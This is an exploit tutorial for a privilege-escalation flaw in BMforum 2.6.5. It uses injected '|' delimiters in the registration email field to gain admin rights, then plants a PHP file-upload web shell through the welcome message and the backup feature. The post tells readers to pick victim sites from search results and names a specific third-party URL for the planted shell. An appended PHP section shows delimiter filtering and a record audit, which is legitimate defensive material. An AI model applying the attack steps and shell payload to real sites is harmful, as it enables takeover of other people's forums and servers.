BMF privilege escalation!
Author: ezboy
Source: Firefox www.wrsky.com

The BMF elevation of privilege vulnerability arises mainly at member registration: some of the submitted information is not filtered for the | symbol, and the forum's member archive format is XXX|XXXX|XXXX, using | as the separator.

The email field is one that is not filtered. Submit:

Test@test.com|000 | 000 | 000 | 000 | 00 | 0 | 00 | | 0 |

Comparing this format with the administrator's registration format shows that a record whose 19th field is 0 is an administrator. After the registration is completed, the account is found to be an administrator.

You can then add a Trojan in the announcement and use the forum backup to turn it into a PHP file.

Exploitation process:
Affected versions:
BMforum Plus! 2.6.5 New Year Edition
BMforum Datium! 2.6.5 New Year Edition
Search on Baidu, pick any one of the results, and open the user registration page:
The attack uses the incompletely filtered registration fields.
Fill in the Mail field in this format:
TEST@test.com | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
Register a user eztest, password: eztest, with the Mail field in the format above.
Log in, click the management center, and enter the user name and password above to reach the admin back end.
Management page: adminIndex.php
In the text of the registration welcome message, enter:
'; COPY ($ _ files [mf] [tmp_name], $ _ files [mf] [name])?>
Forum backup:
Select only the welcome information file for backup and deselect all others.
Specify the backup directory.
Backup path: face/222/other (this directory is required).
Complete path:
http://saiy.77yan.com/wrsky/face/222/other/welcome.php
PHPCL.htm
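
The root cause described above is that registration fields reach a |-delimited member record without the delimiter being filtered. The following is an added example, not BMForum's own code: a hypothetical four-field record layout (name|password hash|email|group) showing the unsafe join beside a hardened writer, plus an audit pass that flags stored records whose field count does not match the schema. All function names, the layout and the sample values are constructed for illustration.

```php
<?php
// Added example: hypothetical flat-file member store, not BMForum's code.
const DELIM = '|';
const FIELD_COUNT = 4; // assumed layout: name|password hash|email|group

// Vulnerable pattern: fields are joined without checking for the delimiter.
function record_unsafe(array $fields): string {
    return implode(DELIM, $fields);
}

// Hardened: reject any field carrying the delimiter, a line break or NUL,
// and validate the e-mail syntax before the record is built.
function record_safe(array $fields): string {
    if (count($fields) !== FIELD_COUNT) {
        throw new InvalidArgumentException('wrong field count');
    }
    foreach ($fields as $f) {
        if (!is_string($f) || preg_match('/[|\r\n\x00]/', $f)) {
            throw new InvalidArgumentException('illegal character in field');
        }
    }
    if (filter_var($fields[2], FILTER_VALIDATE_EMAIL) === false) {
        throw new InvalidArgumentException('invalid e-mail');
    }
    return implode(DELIM, $fields);
}

// Audit helper: return the indices of stored lines whose field count
// differs from the schema, which is what an injected delimiter produces.
function audit(array $lines): array {
    $bad = [];
    foreach ($lines as $n => $line) {
        if (count(explode(DELIM, rtrim($line, "\r\n"))) !== FIELD_COUNT) {
            $bad[] = $n;
        }
    }
    return $bad;
}

// Constructed input: the e-mail value smuggles an extra field, so every
// later field (including the group) shifts one position to the right.
$input  = ['eztest', 'hash', 'test@test.com|0', 'member'];
$stored = [record_unsafe(['alice', 'hash', 'alice@example.com', 'member']),
           record_unsafe($input)];
var_dump(audit($stored)); // indices of malformed records in $stored
try {
    record_safe($input);
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}
```

Rejecting the delimiter at write time closes the registration path; running the audit over an existing member file shows whether records were already written with shifted fields.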